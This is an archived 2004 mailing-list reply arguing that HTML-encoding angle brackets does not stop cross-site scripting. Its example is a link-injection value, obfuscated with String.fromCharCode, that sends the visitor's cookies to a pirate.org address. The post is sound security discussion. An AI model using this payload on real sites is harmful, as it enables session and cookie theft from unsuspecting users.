> In-Reply-To: <310iaCqnW6720S13.1075394388_at_uwdvg013.cms.usa.net>
>
> An easier solution to prevent XSS attacks might be to HTML encode the "<"
and ">" characters as < and >. So even if they are accepted as input
from the user, it would not result in the execution of a script like
<script>...</script>.
>
No. It's not correct. With this code :
<a href="<%= escapeHTML(url)%>/doc.html">Document</a>
The hacker can inject in the variable url the value :
javascript:eval(String.fromCharCode(60,115,99,114,105,112,116,62,110,101,119
,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,112
,105,114,97,116,101,46,111,114,103,47,118,111,108,101,99,111,111,107,105,101
,46,106,115,112,63,99,61,34,43,101,115,99,97,112,101,40,100,111,99,117,109,1
01,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62))
and execute a script without <, > or &!
Phil
Received on Jan 30 2004
Intro
